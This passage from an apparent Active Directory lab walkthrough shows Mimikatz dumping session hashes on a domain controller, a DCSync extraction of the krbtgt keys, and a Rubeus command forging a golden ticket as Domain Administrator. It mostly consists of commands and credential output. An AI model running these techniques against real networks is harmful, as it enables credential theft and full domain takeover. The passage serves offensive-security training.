rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 369215 (00000000:0005a23f)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:40:05 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532e5b1585adee6a12b
rc4_hmac_nt af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old af0686cc0ca8f04df42210c9ac980760
rc4_md4 af0686cc0ca8f04df42210c9ac980760
rc4_hmac_nt_exp af0686cc0ca8f04df42210c9ac980760
rc4_hmac_old_exp af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 338370 (00000000:000529c2)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:39:50 PM
SID : S-1-5-96-0-2
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : ba 19 93 67 9c ed aa d0 71 40 07 2b 1c e9 9d 87 56 92 a9 89 74 d4 fb b2 d8 ba 13 ff dd 42 ca 16 21 f0 21 94 bb f4 bd 74 14 2e ff 76 c6 8a 96 7a 2c c9 48 13 a4 a1 80 d6 f5 e2 aa 96 b6 87 57 8d 81 bd f4 21 a1 e7 51 e2 65 50 fd 72 c5 40 2f e8 c1 1e 99 55 23 84 97 83 66 40 8b a7 a5 0d a5 92 e0 13 a2 b1 ed a7 67 1d 2d 88 26 23 48 fa 8b 87 2b 87 80 ba 3a 50 00 93 b1 48 f8 1e 6c 5b 74 33 b6 28 59 02 c3 10 4f e1 88 d3 c4 a6 c6 11 60 4c 49 f5 a8 d2 c1 f8 c6 38 7b a5 28 f6 55 22 d1 7e 01 51 87 19 b8 1a 98 23 8a c4 47 4f f7 87 a9 b2 e9 9e b7 f5 96 8f 57 27 90 1d 5e 14 3b 70 cb a2 78 c3 20 54 39 8f 53 0e 31 5a e9 a6 5f 9c 30 75 af 61 82 b4 73 3e 57 d5 2e f8 f7 12 70 b4 40 45 dc 9b a4 99 9b 76 c5 89 8b a7 1a bf 0b ab 02 7c
* Key List :
aes256_hmac 8cab277d4f79f03e68fc8589851a4758fe7d1cef9f3c6e801c99b477078fb91b
aes128_hmac 0f4cb6ab8323ed7b6bf7ea1d52c78a6c
rc4_hmac_nt 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old 681c98d8e718d09f2fa74105db9a6729
rc4_md4 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_nt_exp 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old_exp 681c98d8e718d09f2fa74105db9a6729
Authentication Id : 0 ; 338332 (00000000:0005299c)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:39:50 PM
SID : S-1-5-96-0-2
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : 8f cd 1d 76 f4 c9 30 82 27 ec a0 7e 35 af a6 ad f0 45 c8 a7 fc ac 00 84 7a 18 12 92 1a 61 2c df 2d d4 e2 fa 59 a4 10 a1 de a0 82 94 f0 bf c6 89 56 0e b5 ab b1 01 46 93 50 19 91 b6 62 19 8f 54 4e b7 33 81 78 cc bc 84 a1 8b 66 bc c6 5f 9a 8a ea 9a 3d ea e4 75 af a7 86 7d 8c 36 b6 ca 9c 7f 46 46 89 4a 91 a6 28 63 03 dc 00 7b 1b 4f 00 29 f7 85 20 81 b7 13 2d 99 45 5d 59 48 6d 99 a7 02 34 a4 52 bb b2 8b 83 6b 0d 7d 05 c0 10 91 61 99 c0 09 3c 72 27 a2 f9 cb c5 e7 48 56 da a4 ee 7a 4a 34 c8 e7 2d a5 74 97 63 59 ab 10 49 af fb d7 f1 40 fa 86 b2 82 18 60 02 35 a4 93 2f a3 f5 46 f5 d4 a9 a1 16 d8 48 a9 4c 7f 9b 70 80 e2 69 c2 4c 34 c5 86 02 c5 42 51 b5 65 43 71 31 04 2e d3 90 15 1f 55 ee 1a 7a 1b 84 d2 aa 85 9e 19 3c 8b
* Key List :
aes256_hmac b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd
aes128_hmac 889ddb22ef9b50ee84b2e4950eb14549
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
Authentication Id : 0 ; 42411 (00000000:0000a5ab)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-90-0-1
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : ba 19 93 67 9c ed aa d0 71 40 07 2b 1c e9 9d 87 56 92 a9 89 74 d4 fb b2 d8 ba 13 ff dd 42 ca 16 21 f0 21 94 bb f4 bd 74 14 2e ff 76 c6 8a 96 7a 2c c9 48 13 a4 a1 80 d6 f5 e2 aa 96 b6 87 57 8d 81 bd f4 21 a1 e7 51 e2 65 50 fd 72 c5 40 2f e8 c1 1e 99 55 23 84 97 83 66 40 8b a7 a5 0d a5 92 e0 13 a2 b1 ed a7 67 1d 2d 88 26 23 48 fa 8b 87 2b 87 80 ba 3a 50 00 93 b1 48 f8 1e 6c 5b 74 33 b6 28 59 02 c3 10 4f e1 88 d3 c4 a6 c6 11 60 4c 49 f5 a8 d2 c1 f8 c6 38 7b a5 28 f6 55 22 d1 7e 01 51 87 19 b8 1a 98 23 8a c4 47 4f f7 87 a9 b2 e9 9e b7 f5 96 8f 57 27 90 1d 5e 14 3b 70 cb a2 78 c3 20 54 39 8f 53 0e 31 5a e9 a6 5f 9c 30 75 af 61 82 b4 73 3e 57 d5 2e f8 f7 12 70 b4 40 45 dc 9b a4 99 9b 76 c5 89 8b a7 1a bf 0b ab 02 7c
* Key List :
aes256_hmac 8cab277d4f79f03e68fc8589851a4758fe7d1cef9f3c6e801c99b477078fb91b
aes128_hmac 0f4cb6ab8323ed7b6bf7ea1d52c78a6c
rc4_hmac_nt 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old 681c98d8e718d09f2fa74105db9a6729
rc4_md4 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_nt_exp 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old_exp 681c98d8e718d09f2fa74105db9a6729
Authentication Id : 0 ; 25567 (00000000:000063df)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-96-0-1
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : ba 19 93 67 9c ed aa d0 71 40 07 2b 1c e9 9d 87 56 92 a9 89 74 d4 fb b2 d8 ba 13 ff dd 42 ca 16 21 f0 21 94 bb f4 bd 74 14 2e ff 76 c6 8a 96 7a 2c c9 48 13 a4 a1 80 d6 f5 e2 aa 96 b6 87 57 8d 81 bd f4 21 a1 e7 51 e2 65 50 fd 72 c5 40 2f e8 c1 1e 99 55 23 84 97 83 66 40 8b a7 a5 0d a5 92 e0 13 a2 b1 ed a7 67 1d 2d 88 26 23 48 fa 8b 87 2b 87 80 ba 3a 50 00 93 b1 48 f8 1e 6c 5b 74 33 b6 28 59 02 c3 10 4f e1 88 d3 c4 a6 c6 11 60 4c 49 f5 a8 d2 c1 f8 c6 38 7b a5 28 f6 55 22 d1 7e 01 51 87 19 b8 1a 98 23 8a c4 47 4f f7 87 a9 b2 e9 9e b7 f5 96 8f 57 27 90 1d 5e 14 3b 70 cb a2 78 c3 20 54 39 8f 53 0e 31 5a e9 a6 5f 9c 30 75 af 61 82 b4 73 3e 57 d5 2e f8 f7 12 70 b4 40 45 dc 9b a4 99 9b 76 c5 89 8b a7 1a bf 0b ab 02 7c
* Key List :
aes256_hmac 8cab277d4f79f03e68fc8589851a4758fe7d1cef9f3c6e801c99b477078fb91b
aes128_hmac 0f4cb6ab8323ed7b6bf7ea1d52c78a6c
rc4_hmac_nt 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old 681c98d8e718d09f2fa74105db9a6729
rc4_md4 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_nt_exp 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old_exp 681c98d8e718d09f2fa74105db9a6729
Authentication Id : 0 ; 25557 (00000000:000063d5)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:56 PM
SID : S-1-5-96-0-0
* Username : DCORP-DC$
* Domain : dollarcorp.moneycorp.local
* Password : ba 19 93 67 9c ed aa d0 71 40 07 2b 1c e9 9d 87 56 92 a9 89 74 d4 fb b2 d8 ba 13 ff dd 42 ca 16 21 f0 21 94 bb f4 bd 74 14 2e ff 76 c6 8a 96 7a 2c c9 48 13 a4 a1 80 d6 f5 e2 aa 96 b6 87 57 8d 81 bd f4 21 a1 e7 51 e2 65 50 fd 72 c5 40 2f e8 c1 1e 99 55 23 84 97 83 66 40 8b a7 a5 0d a5 92 e0 13 a2 b1 ed a7 67 1d 2d 88 26 23 48 fa 8b 87 2b 87 80 ba 3a 50 00 93 b1 48 f8 1e 6c 5b 74 33 b6 28 59 02 c3 10 4f e1 88 d3 c4 a6 c6 11 60 4c 49 f5 a8 d2 c1 f8 c6 38 7b a5 28 f6 55 22 d1 7e 01 51 87 19 b8 1a 98 23 8a c4 47 4f f7 87 a9 b2 e9 9e b7 f5 96 8f 57 27 90 1d 5e 14 3b 70 cb a2 78 c3 20 54 39 8f 53 0e 31 5a e9 a6 5f 9c 30 75 af 61 82 b4 73 3e 57 d5 2e f8 f7 12 70 b4 40 45 dc 9b a4 99 9b 76 c5 89 8b a7 1a bf 0b ab 02 7c
* Key List :
aes256_hmac 8cab277d4f79f03e68fc8589851a4758fe7d1cef9f3c6e801c99b477078fb91b
aes128_hmac 0f4cb6ab8323ed7b6bf7ea1d52c78a6c
rc4_hmac_nt 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old 681c98d8e718d09f2fa74105db9a6729
rc4_md4 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_nt_exp 681c98d8e718d09f2fa74105db9a6729
rc4_hmac_old_exp 681c98d8e718d09f2fa74105db9a6729
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-DC$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:52 PM
SID : S-1-5-18
* Username : dcorp-dc$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b3cece7040400b2581d36c0719c3e3ba4403b97d7e07c315f01f55fb7f8d05ff
rc4_hmac_nt e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old e355a154a94da7c6b292dd60a207a7c5
rc4_md4 e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_nt_exp e355a154a94da7c6b292dd60a207a7c5
rc4_hmac_old_exp e355a154a94da7c6b292dd60a207a7c5
mimikatz(commandline) # exit
Bye!
Now let’s search for the KRBTGT Account Secrets
.\\BetterSafetyKatz.exe '"lsadump::dcsync /user:dcorp\\krbtgt"' "exit"
KRBTGT Secrets
[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents> .\\BetterSafetyKatz.exe '"lsadump::dcsync /user:dcorp\\krbtgt"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:dcorp\\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd
mimikatz(commandline) # exit
Bye!
Now let’s use the KRBTGT hash to Forge a golden ticket as Domain Administrator
.\\Rubeus.exe golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:2453 /netbios:dcorp /groups:544,512,520,513 /dc:DCORPDC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
Now let’s list the Tickets
klist
